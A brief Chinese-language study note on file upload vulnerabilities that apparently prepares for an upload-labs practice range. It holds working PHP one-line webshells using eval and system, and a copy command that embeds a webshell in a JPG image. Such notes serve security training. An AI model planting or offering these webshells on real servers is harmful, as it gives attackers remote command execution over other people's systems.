1、知识
X-Forwarded-For:表示HTTP请求端的真实IP
文件上传漏洞(头像更改、发邮件、上传资料等)
1、利用文件上传功能上传恶意文件:一句话木马文件、反弹shell的exe
2、上传文件的路径可访问
3、上传文件所在的路径具备可执行权限
代码语言:txt复制一句话木马
传参方式:POST GET REQUEST
<?php @eval($_POST['c']);?>
@:防报错
eval() :代码执行函数
<?php @system($_POST['c']);?>
#将木马写到图片中
copy a.jpg/b muma.php/a muma.jpg2、文件上传
(1)靶场
代码语言:txt复制http://116.205.189.153:9003/Pass-01/index.php
